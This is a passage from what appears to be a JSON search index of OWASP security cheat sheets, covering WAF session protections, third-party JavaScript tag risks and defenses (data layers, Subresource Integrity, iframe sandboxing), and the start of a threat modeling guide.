There are situations where the web application source code is not available or cannot be modified, or when the changes required to implement the multiple security recommendations and best practices detailed above imply a full redesign of the web application architecture, and therefore, cannot be easily implemented in the short term.

In these scenarios, or to complement the web application defenses, and with the goal of keeping the web application as secure as possible, it is recommended to use external protections such as Web Application Firewalls (WAFs) that can mitigate the session management threats already described.

Web Application Firewalls offer detection and protection capabilities against session based attacks. On the one hand, it is trivial for WAFs to enforce the usage of security attributes on cookies, such as the Secure and HttpOnly flags, applying basic rewriting rules on the Set-Cookie header for all the web application responses that set a new cookie.

On the other hand, more advanced capabilities can be implemented to allow the WAF to keep track of sessions, and the corresponding session IDs, and apply all kind of protections against session fixation (by renewing the session ID on the client-side when privilege changes are detected), enforcing sticky sessions (by verifying the relationship between the session ID and other client properties, like the IP address or User-Agent), or managing session expiration (by forcing both the client and the web application to finalize the session).

The open-source ModSecurity WAF, plus the OWASP Core Rule Set, provide capabilities to detect and apply security cookie attributes, countermeasures against session fixation attacks, and session tracking features to enforce sticky sessions.

"},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html","title":"TLS Cipher String Cheat Sheet","text":""},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Mozilla Foundation provides an easy-to-use secure configuration generator for web, database, and mail software. This online (and well updated) tools allows site administrators to select the software they are using and receive a configuration file that is both safe and compatible for a wide variety of browser versions and server software.

For more information please visit https://ssl-config.mozilla.org/.

"},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html","title":"Third Party JavaScript Management Cheat Sheet","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Tags, aka marketing tags, analytics tags etc. are small bits of JavaScript on a web page. They can also be HTML image elements when JavaScript is disabled. The reason for them is to collect data on the web user actions and browsing context for use by the web page owner in marketing.

Third party vendor JavaScript tags (hereinafter, tags) can be divided into two types:

User interface tags have to execute on the client because they change the DOM; displaying a dialog or image or changing text etc.

Analytics tags send information back to a marketing information database; information like what user action was just taken, browser metadata, location information, page metadata etc. The rationale for analytics tags is to provide data from the user's browser DOM to the vendor for some form of marketing analysis. This data can be anything available in the DOM. The data is used for user navigation and clickstream analysis, identification of the user to determine further content to display etc., and various marketing analysis functions.

The term host refers to the original site the user goes to, such as a shopping or news site, that contains or retrieves and executes third party JavaScript tag for marketing analysis of the user actions.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#major-risks","title":"Major risks","text":"

The single greatest risk is a compromise of the third party JavaScript server, and the injection of malicious JavaScript into the original tag JavaScript. This has happened in 2018 and likely earlier.

The invocation of third-party JS code in a web application requires consideration for 3 risks in particular:

  1. The loss of control over changes to the client application,
  2. The execution of arbitrary code on client systems,
  3. The disclosure or leakage of sensitive information to 3rd parties.
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-1-loss-of-control-over-changes-to-the-client-application","title":"Risk 1: Loss of control over changes to the client application","text":"

This risk arises from the fact that there is usually no guaranty that the code hosted at the third-party will remain the same as seen from the developers and testers: new features may be pushed in the third-party code at any time, thus potentially breaking the interface or data-flows and exposing the availability of your application to its users/customers.

Typical defenses include, but are not restricted to: in-house script mirroring (to prevent alterations by 3rd parties), sub-resource integrity (to enable browser-level interception) and secure transmission of the third-party code (to prevent modifications while in-transit). See below for more details.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-2-execution-of-arbitrary-code-on-client-systems","title":"Risk 2: Execution of arbitrary code on client systems","text":"

This risk arises from the fact that third-party JavaScript code is rarely reviewed by the invoking party prior to its integration into a website/application. As the client reaches the hosting website/application, this third-party code gets executed, thus granting the third-party the exact same privileges that were granted to the user (similar to XSS attacks).

Any testing performed prior to entering production loses some of its validity, including AST testing (IAST, RAST, SAST, DAST, etc.).

While it is widely accepted that the probability of having rogue code intentionally injected by the third-party is low, there are still cases of malicious injections in third-party code after the organization's servers were compromised (ex: Yahoo, January 2014).

This risk should therefore still be evaluated, in particular when the third-party does not show any documentation that it is enforcing better security measures than the invoking organization itself, or at least equivalent. Another example is that the domain hosting the third-party JavaScript code expires because the company maintaining it is bankrupt or the developers have abandoned the project. A malicious actor can then re-register the domain and publish malicious code.

Typical defenses include, but are not restricted to:

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-3-disclosure-of-sensitive-information-to-3rd-parties","title":"Risk 3: Disclosure of sensitive information to 3rd parties","text":"

When a third-party script is invoked in a website/application, the browser directly contacts the third-party servers. By default, the request includes all regular HTTP headers. In addition to the originating IP address of the browser, the third-party also obtains other data such as the referrer (in non-https requests) and any cookies previously set by the 3rd party, for example when visiting another organization's website that also invokes the third-party script.

In many cases, this grants the third-party primary access to information on the organization's users / customers / clients. Additionally, if the third-party is sharing the script with other entities, it also collects secondary data from all the other entities, thus knowing who the organization's visitors are but also what other organizations they interact with.

A typical case is the current situation with major news/press sites that invoke third-party code (typically for ad engines, statistics and JavaScript APIs): any user visiting any of these websites also informs the 3rd parties of the visit. In many cases, the third-party also gets to know what news articles each individual user is clicking specifically (leakage occurs through the HTTP referrer field) and thus can establish deeper personality profiles.

Typical defenses include, but are not restricted to: in-house script mirroring (to prevent leakage of HTTP requests to 3rd parties). Users can reduce their profiling by random clicking links on leaking websites/applications (such as press/news websites) to reduce profiling. See below for more details.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#third-party-javascript-deployment-architectures","title":"Third-party JavaScript Deployment Architectures","text":"

There are three basic deployment mechanisms for tags. These mechanisms can be combined with each other.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#vendor-javascript-on-page","title":"Vendor JavaScript on page","text":"

This is where the vendor provides the host with the JavaScript and the host puts it on the host page. To be secure the host company must review the code for any vulnerabilities like XSS attacks or malicious actions such as sending sensitive data from the DOM to a malicious site. This is often difficult because the JavaScript is commonly obfuscated.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0foobar.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n<html>\n<head></head>\n    <body>\n        ...\n        <script\u00a0type=\"text/javascript\">/*\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0here\u00a0*/</script>\n    </body>\n</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#javascript-request-to-vendor","title":"JavaScript Request to Vendor","text":"

This is where one or a few lines of code on the host page each request a JavaScript file or URL directly from the vendor site. When the host page is being created, the developer includes the lines of code provided by the vendor that will request the vendor JavaScript. Each time the page is accessed the requests are made to the vendor site for the javascript, which then executes on the user browser.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0foobar.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->`\n<html>\n    <head></head>\n    <body>\n        ...\n        <!--\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n        <script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"></script>\n        <!--\u00a0/3rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n    </body>\n</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#indirect-request-to-vendor-through-tag-manager","title":"Indirect request to Vendor through Tag Manager","text":"

This is where one or a few lines of code on the host page each request a JavaScript file or URL from a tag aggregator or tag manager site; not from the JavaScript vendor site. The tag aggregator or tag manager site returns whatever third party JavaScript files that the host company has configured to be returned. Each file or URL request to the tag manager site can return lots of other JavaScript files from multiple vendors.

The actual content that is returned from the aggregator or manager (i.e. the specific JavaScript files as well as exactly what they do) can be dynamically changed by host site employees using a graphical user interface for development, hosted on the tag manager site that non-technical users can work with, such as the marketing part of the business.

The changes can be either:

  1. Get a different JavaScript file from the third-party vendor for the same request.
  2. Change what DOM object data is read, and when, to send to the vendor.

The tag manager developer user interface will generate code that does what the marketing functionality requires, basically determining what data to get from the browser DOM and when to get it. The tag manager always returns a container JavaScript file to the browser which is basically a set of JavaScript functions that are used by the code generated by the user interface to implement the required functionality.

Similar to java frameworks that provide functions and global data to the developer, the container JavaScript executes on the browser and lets the business user use the tag manager developer user interface to specify high level functionality without needing to know JavaScript.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0foobar.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0Tag\u00a0Manager\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script>(function(w,\u00a0d,\u00a0s,\u00a0l,\u00a0i){\nw[l]\u00a0=\u00a0w[l]\u00a0||\u00a0[];\nw[l].push({'tm.start':new\u00a0Date().getTime(),\u00a0event:'tm.js'});\nvar\u00a0f\u00a0=\u00a0d.getElementsByTagName(s)[0],\nj\u00a0=\u00a0d.createElement(s),\ndl\u00a0=\u00a0l\u00a0!=\u00a0'dataLayer'\u00a0?\u00a0'&l='\u00a0+\u00a0l\u00a0:\u00a0'';\nj.async=true;\nj.src='https://tagmanager.com/tm.js?id='\u00a0+\u00a0i\u00a0+\u00a0dl;\nf.parentNode.insertBefore(j,\u00a0f);\n})(window,\u00a0document,\u00a0'script',\u00a0'dataLayer',\u00a0'TM-FOOBARID');</script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0/Tag\u00a0Manager\u00a0-->\n\u00a0\u00a0\u00a0</body>\n</html>`\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#security-problems-with-requesting-tags","title":"Security Problems with requesting Tags","text":"

The previously described mechanisms are difficult to make secure because you can only see the code if you proxy the requests or if you get access to the GUI and see what is configured. The JavaScript is generally obfuscated so even seeing it is usually not useful. It is also instantly deployable because each new page request from a browser executes the requests to the aggregator which gets the JavaScript from the third party vendor. So as soon as any JavaScript files are changed on the vendor, or modified on the aggregator, the next call for them from any browser will get the changed JavaScript. One way to manage this risk is with the Subresource Integrity standard described below.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#server-direct-data-layer","title":"Server Direct Data Layer","text":"

The tag manager developer user interface can be used to create JavaScript that can get data from anywhere in the browser DOM and store it anywhere on the page. This can allow vulnerabilities because the interface can be used to generate code to get unvalidated data from the DOM (e.g. URL parameters) and store it in some page location that would execute JavaScript.

The best way to make the generated code secure is to confine it to getting DOM data from a host defined data layer.

The data layer is either:

  1. a DIV object with attribute values that have the marketing or user behavior data that the third-party wants
  2. a set of JSON objects with the same data. Each variable or attribute contains the value of some DOM element or the description of a user action. The data layer is the complete set of values that all vendors need for that page. The data layer is created by the host developers.

When specific events happen that the business has defined, a JavaScript handler for that event sends values from the data layer directly to the tag manager server. The tag manager server then sends the data to whatever third party or parties is supposed to get it. The event handler code is created by the host developers using the tag manager developer user interface. The event handler code is loaded from the tag manager servers on every page load.

This is a secure technique because only your JavaScript executes on your users browser, and only the data you decide on is sent to the vendor.

This requires cooperation between the host, the aggregator or tag manager and the vendors.

The host developers have to work with the vendor in order to know what type of data the vendor needs to do their analysis. Then the host programmer determines what DOM element will have that data.

The host developers have to work with the tag manager or aggregator to agree on the protocol to send the data to the aggregator: what URL, parameters, format etc.

The tag manager or aggregator has to work with the vendor to agree on the protocol to send the data to the vendor: what URL, parameters, format etc. Does the vendor have an API?

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#security-defense-considerations","title":"Security Defense Considerations","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#server-direct-data-layer_1","title":"Server Direct Data Layer","text":"

The server direct mechanism is a good security standard for third party JavaScript management, deployment and execution. A good practice for the host page is to create a data layer of DOM objects.

The data layer can perform any validation of the values, especially values from DOM objects exposed to the user like URL parameters and input fields, if these are required for the marketing analysis.

An example statement for a corporate standard document is 'The tag JavaScript can only access values in the host data layer. The tag JavaScript can never access a URL parameter.

You the host page developer have to agree with the third-party vendors or the tag manager what attribute in the data layer will have what value so they can create the JavaScript to read that value.

User interface tags cannot be made secure using the data layer architecture because their function (or one of their functions) is to change the user interface on the client, not to send data about the user actions.

Analytics tags can be made secure using the data layer architecture because the only action needed is to send data from the data layer to the third party. Only first party code is executed; first to populate the data layer (generally on page load); then event handler JavaScript sends whatever data is needed from that page to the third party database or tag manager.

This is also a very scalable solution. Large ecommerce sites can easily have hundreds of thousands of URL and parameter combinations, with different sets of URLs and parameters being included in different marketing analysis campaigns. The marketing logic could have 30 or 40 different vendor tags on a single page.

For example user actions in pages about specified cities, from specified locations on specified days should send data layer elements 1, 2 and 3. User actions in pages about other cities should send data layer elements 2 and 3 only. Since the event handler code to send data layer data on each page is controlled by the host developers or marketing technologists using the tag manager developer interface, the business logic about when and what data layer elements are sent to the tag manager server, can be changed and deployed in minutes. No interaction is needed with the third parties; they continue getting the data they expect but now it comes from different contexts that the host marketing technologists have chosen.

Changing third party vendors just means changing the data dissemination rules at the tag manager server, no changes are needed in the host code. The data also goes directly only to the tag manager so the execution is fast. The event handler JavaScript does not have to connect to multiple third party sites.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#indirect-requests","title":"Indirect Requests","text":"

For indirect requests to tag manager/aggregator sites that offer the GUI to configure the javascript, they may also implement:

The host company should also verify the security practices of the tag manager site such as access controls to the tag configuration for the host company. It also can be two-factor authentication.

Letting the marketing folks decide where to get the data they want can result in XSS because they may get it from a URL parameter and put it into a variable that is in a scriptable location on the page.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#sandboxing-content","title":"Sandboxing Content","text":"

Both of these tools be used by sites to sandbox/clean DOM data.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity","title":"Subresource Integrity","text":"

Subresource Integrity will ensure that only the code that has been reviewed is executed. The developer generates integrity metadata for the vendor javascript, and adds it to the script element like this:

<script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"\nintegrity=\"sha384-MBO5IDfYaE6c6Aao94oZrIOiC7CGiSNE64QUbHNPhzk8Xhm0djE6QqTpL0HzTUxk\"\ncrossorigin=\"anonymous\">\n</script>\n

It is important to know that in order for SRI to work, the vendor host needs CORS enabled. Also it is good idea to monitor vendor JavaScript for changes in regular way. Because sometimes you can get secure but not working third-party code when the vendor decides to update it.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#keeping-javascript-libraries-updated","title":"Keeping JavaScript libraries updated","text":"

OWASP Top 10 2013 A9 describes the problem of using components with known vulnerabilities. This includes JavaScript libraries. JavaScript libraries must be kept up to date, as previous version can have known vulnerabilities which can lead to the site typically being vulnerable to Cross Site Scripting. There are several tools out there that can help identify such libraries. One such tool is the free open source tool RetireJS

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#sandboxing-with-iframe","title":"Sandboxing with iframe","text":"

You can also put vendor JavaScript into an iframe from different domain (e.g. static data host). It will work as a \"jail\" and vendor JavaScript will not have direct access to the host page DOM and cookies.

The host main page and sandbox iframe can communicate between each other via the postMessage mechanism.

Also, iframes can be secured with the iframe sandbox attribute.

For high risk applications, consider the use of Content Security Policy (CSP) in addition to iframe sandboxing. CSP makes hardening against XSS even stronger.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0somehost.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0Include\u00a0iframe\u00a0with\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<iframe\n       src=\"https://somehost-static.net/analytics.html\"\n       sandbox=\"allow-same-origin\u00a0allow-scripts\">\n       </iframe>\n\u00a0\u00a0\u00a0</body>\n\u00a0</html>\n\n<!--\u00a0somehost-static.net/analytics.html\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script>\nwindow.addEventListener(\"message\",\u00a0receiveMessage,\u00a0false);\nfunction\u00a0receiveMessage(event)\u00a0{\nif\u00a0(event.origin\u00a0!==\u00a0\"https://somehost.com:443\")\u00a0{\nreturn;\n}\u00a0else\u00a0{\n//\u00a0Make\u00a0some\u00a0DOM\u00a0here\u00a0and\u00a0initialize\u00a0other\n//data\u00a0required\u00a0for\u00a03rd\u00a0party\u00a0code\n}\n}\n</script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"></script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0/3rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0</body>\n\u00a0</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#virtual-iframe-containment","title":"Virtual iframe Containment","text":"

This technique creates iFrames that run asynchronously in relation to the main page. It also provides its own containment JavaScript that automates the dynamic implementation of the protected iFrames based on the marketing tag requirements.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#vendor-agreements","title":"Vendor Agreements","text":"

You can have the agreement or request for proposal with the 3rd parties require evidence that they have implemented secure coding and general corporate server access security. But in particular you need to determine the monitoring and control of their source code in order to prevent and detect malicious changes to that JavaScript.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#martechsec","title":"MarTechSec","text":"

Marketing Technology Security

This refers to all aspects of reducing the risk from marketing JavaScript. Controls include

  1. Contractual controls for risk reduction; the contracts with any MarTech company should include a requirement to show evidence of code security and code integrity monitoring.
  2. Contractual controls for risk transference: the contracts with any MarTech company could include a penalty for serving malicious JavaScript
  3. Technical controls for malicious JavaScript execution prevention; Virtual Iframes,
  4. Technical controls for malicious JavaScript identification; Subresource Integrity.
  5. Technical controls including client side JavaScript malicious behavior in penetration testing requirements.
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#marsecops","title":"MarSecOps","text":"

Marketing Security Operations

This refers to the operational requirements to maintain some of the technical controls. This involves possible cooperation and information exchange between the marketing team, the martech provider and the run or operations team to update the information in the page controls (SRI hash change, changes in pages with SRI), the policies in the Virtual iFrames, tag manager configuration, data layer changes etc.

The most complete and preventive controls for any site containing non-trivial marketing tags are -

  1. A data layer that calls the marketing server or tag manager APIs , so that only your code executes on your page (inversion of control).

  2. Subresource Integrity.

  3. Virtual frame Containment.

The MarSecOps requirements to implement technical controls at the speed of change that marketing wants or without a significant number of dedicated resources, can make data layer and Subresource Integrity controls impractical.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html","title":"Threat Modeling Cheat Sheet","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Threat modeling is a structured approach of identifying and prioritizing potential threats to a system, and determining the value that potential mitigations would have in reducing or neutralizing those threats. This cheat sheet aims to provide guidance on how to create threat models for both existing systems or applications as well as new systems.

You do not need to be a security expert in order to implement the techniques covered in this cheat sheet. All developers, software and system designers, and architects should strive to include threat modeling in their software development life cycle. Optimally, you will create your threat models and determine which mitigations are needed during an early stage of the development of a new system, application, or feature. Assessing potential threats during the design phase of your project can save significant resources that might be needed to refactor the project to include risk mitigations during a later phase of the project.

When you produce a threat model, you will:

Note that throughout the document, the terms \"systems\" and \"applications\" are used interchangeably. The principles in the document apply equally to designing and building systems such as network infrastructures or server clusters as they do to designing or developing desktop, mobile, or web applications.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#threat-modeling-terminology","title":"Threat Modeling Terminology","text":"

You should be familiar with the following terms that will be used throughout this cheat sheet.

A threat agent is an individual or group that is capable of carrying out a particular threat. It is fundamental to identify who would want to exploit the assets of a company, how they might use them against the company, and if they would be capable of doing so. Some threats require more expertise or resources, and thus raise the level of threat actor needed. For example, if a threat requires hundreds of thousands of dollars of computing power to implement, it is likely that only organized corporate, criminal, or government actors would be valid threat actors for such a threat. However, with the rise of cloud computing and the prevalence of attack software on the internet, other threats may be easy to implement with relatively little skill and few resources.

Impact is a measure of the potential damage caused by a particular threat. Impact and damage can take a variety of forms. A threat may result in damage to physical assets, or may result in obvious financial loss. Indirect loss may also result from an attack, and needs to be considered as part of the impact. For example, if your company's website were defaced this could cause damage to your company's reputation, which may in turn cause a loss of business because of the loss of confidence by your users. Depending on the business you are in, attacks that expose user information could potentially result in a physical threat of harm or loss of life to your users, greatly raising the impact of threats that would allow such exposure.

Likelihood is a measure of the possibility of a threat being carried out. A variety of factors can impact the likelihood of a threat being carried out, including how difficult the implementation of the threat is, and how rewarding it would be to the attacker. For example, if a threat required a skilled threat actor with tens of thousands of dollars of computing resources to implement, and the only reward was that they were able to gain access to information that is already public in some other form, the likelihood is low. However, if the threat is relatively easy to accomplish, or if the attacker were to gain valuable information from which they could profit, the likelihood may be higher.

Controls are safeguards or countermeasures that you put in place in order to avoid, detect, counteract, or minimize potential threats against your information, systems, or other assets.

Preventions are controls that may completely prevent a particular attack from being possible. For example, if you identify a threat that your users' personal information may be identified by certain application logging, and you decide to completely remove that logging, you have prevented that particular threat.

Mitigations are controls that are put in place to reduce either the likelihood or the impact of a threat, while not necessarily completely preventing it. For example, if you store your user's passwords as hashes in a database, two users who have the same password will have the same hash. Thus, if an attacker has access to the hashed passwords and is able to determine the password associated with one hash, he is easily able to find all the other users who share the same password simply by looking for the same hash. However, if you add salts to each user's password, the cost of this particular attack is greatly increased, as the attacker must crack each password individual. An increase in cost reduces the likelihood, and thus has mitigated the attack.

A data flow diagram is a depiction of how information flows through your system. It shows each place that data is input into or output from each process or subsystem. It includes anywhere that data is stored in the system, either temporarily or long-term.

A trust boundary (in the context of threat modeling) is a location on the data flow diagram where data changes its level of trust. Any place where data is passed between two processes is typically a trust boundary. If your application reads a file from disk, there's a trust boundary between the application and the file because outside processes and users can modify the data in the file. If your application makes a call to a remote process, or a remote process makes calls to your application, that's a trust boundary. If you read data from a database, there's typically a trust boundary because other processes can modify the data in the database. Any place you accept user input in any form is always a trust boundary.

In addition to the above terminologies, it is important to be familiar with the key threat modeling principles defined in the Threat Modeling Manifesto project. Those principles are considered throughout the following steps in this cheat sheet.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#getting-started","title":"Getting Started","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-business-objectives","title":"Define Business Objectives","text":"

Before starting the threat modeling process it is important to identify business objectives of the applications you are assessing, and to identify security and compliance requirements that may be necessary due to business or government regulation. Having these objectives and requirements in mind before the threat assessment begins will help you to evaluate the impact of any threat you find during the risk analysis process.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-application-design","title":"Identify application design","text":"

Early in the threat modeling process, you will need to draw a data flow diagram of the entire system that is being assessed, including its trust boundaries. Thus, understanding the design of the application is key to performing threat modeling. Even if you are very familiar with the application design, you may identify additional data flows and trust boundaries throughout the threat modeling process.

A thorough understanding of how the system is designed will also help you assess the likelihood and potential impact of any particular threat that you identify.

When you are assessing an existing system that has existing design documentation, spend time reviewing that documentation. The documentation may be out of date, requiring you to gather new information to update the documentation. Or, there may be not documentation at all, requiring you to create the design documents.

In the optimal case, you are performing your assessment during the design phase of the project, and the design documentation will be up-to-date and available. In any event, this cheat sheet outlines steps you can take to create design documents if they are needed.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#create-design-documents","title":"Create design documents","text":"

There are many ways to generate design documents; the 4+1 view model is one of the matured approaches to building your design document.

Reference to 4+1 view model of architecture here.

Please note that the 4+1 is comprehensive, you may use any other design model during this phase.

The following subsections show the details about 4+1 approach and how this could help in the threat modeling process:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#logical-view","title":"Logical View","text":"

Create a logical map of the Target of Evaluation.

Audience: Designers.

Area: Functional Requirements: describes the design's object model.

Related Artifacts: Design model

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#implementation-view","title":"Implementation View","text":"

Audience: Programmers.

Area: Software components: describes the layers and subsystems of the application.

Related Artifacts: Implementation model, components

Please refer to the image in the appendix section for sample design for the implementation view.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#process-view","title":"Process View","text":"

Audience: Integrators.

Area: Non-functional requirements: describes the design's concurrency and synchronization aspects.

Related Artifacts: (no specific artifact).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#deployment-view","title":"Deployment View","text":"

Create a physical map of the Target of Evaluation

Audience: Deployment managers.

Area: Topology: describes the mapping of the software onto the hardware and shows the system's distributed aspects.

Related Artifacts: Deployment model.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#use-case-view","title":"Use-Case View","text":"

Audience: All the stakeholders of the system, including the end users.

Area: describes the set of scenarios and/or use cases that represent some significant, central functionality of the system.

Related Artifacts: Use-Case Model, Use-Case documents

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#decompose-and-model-the-system","title":"Decompose and Model the System","text":"

Gain an understanding of how the system works to perform a threat model, it is important to understand how the system works and interacts with its ecosystem. To start with creating a high-level information flow diagram, like the following:

  1. Identify the trusted boundaries of your system/application/module/ecosystem that you may want to start off with.
  2. Add actors \u2013 internal and external
  3. Define internal trusted boundaries. These can be the different security zones that have been designed
  4. Relook at the actors you have identified in #2 for consistency
  5. Add information flows
  6. Identify the information elements and their classification as per your information classification policy
  7. Where possible add assets to the identified information flows.
"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-and-evaluate-your-assets","title":"Define and Evaluate your Assets","text":"

Assets involved in the information flow should be defined and evaluated according to their value of confidentiality, integrity and availability.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#consider-data-in-transit-and-data-at-rest","title":"Consider Data in transit and Data at rest","text":"

Data protection in transit is the protection of this data while it\u2019s travelling from network to network or being transferred from a local storage device to a cloud storage device \u2013 wherever data is moving, effective data protection measures for in-transit data are critical as data is often considered less secure while in motion.

While data at rest is sometimes considered to be less vulnerable than data in transit, attackers often find data at rest a more valuable target than data in motion.

The risk profile for data in transit or data at rest depends on the security measures that are in place to secure data in either state. Protecting sensitive data both in transit and at rest is imperative for modern enterprises as attackers find increasingly innovative ways to compromise systems and steal data.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#create-an-information-flow-diagram","title":"Create an information flow diagram","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#whiteboard-your-architecture","title":"Whiteboard Your Architecture","text":"

It is important to whiteboard system architecture by showing the major constraints and decisions in order to frame and start conversations. The value is actually twofold. If the architecture cannot be white-boarded, then it suggests that it is not well understood. If a clear and concise whiteboard diagram can be provided, others will understand it and it will be easier to communicate details.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#manage-to-present-your-dfd-in-the-context-of-mvc","title":"Manage to present your DFD in the context of MVC","text":"

In this step, Data Flow Diagram should be divided in the context of Model, View, Controller (MVC).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#use-tools-to-draw-your-diagram","title":"Use tools to draw your diagram","text":"

If you don\u2019t like to manually draw your DFD; there are several tools available that could be used:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#owasp-threat-dragon","title":"OWASP Threat Dragon","text":"

The OWASP Threat Dragon project is a cross platform tool that runs on Linux, macOS and Windows 10. Threat Dragon (TD) is used to create threat model diagrams and to record possible threats and decide on their mitigations using STRIDE methodology. TD is both a web application and a desktop application; refer to the project's GitHub repository for the latest release.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#poirot","title":"Poirot","text":"

The Poirot tool isolates and diagnoses defects through fault modeling and simulation. Along with a carefully selected partitioning strategy, functional and sequential test pattern applications show success with circuits having a high degree of observability.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#ms-tmt","title":"MS TMT","text":"

The Microsoft Threat Modeling Tool (TMT) helps find threats in the design phase of software projects. It is one of the longest lived threat modeling tools, having been introduced as Microsoft SDL in 2008, and is actively supported; version 7.3 was released March 2020. It runs only on Windows 10 Anniversary Update or later, and so is difficult to use on macOS or Linux.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#owasp-pytm","title":"OWASP pytm","text":"

Pytm is a Python library to help you describe your system in terms of objects and attributes, able to generate a DFD in Graphviz (dot) format, a sequence diagram in plantuml format, and a list of threats (out of CAPEC and other threat libraries) to the system in a templated format. As of 2023 it is under active development. No Python knowledge is necessary for its use - if you can define objects and use .attribute notation, you should be able to use it.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-data-flow-over-your-dfd","title":"Define Data Flow over your DFD","text":"

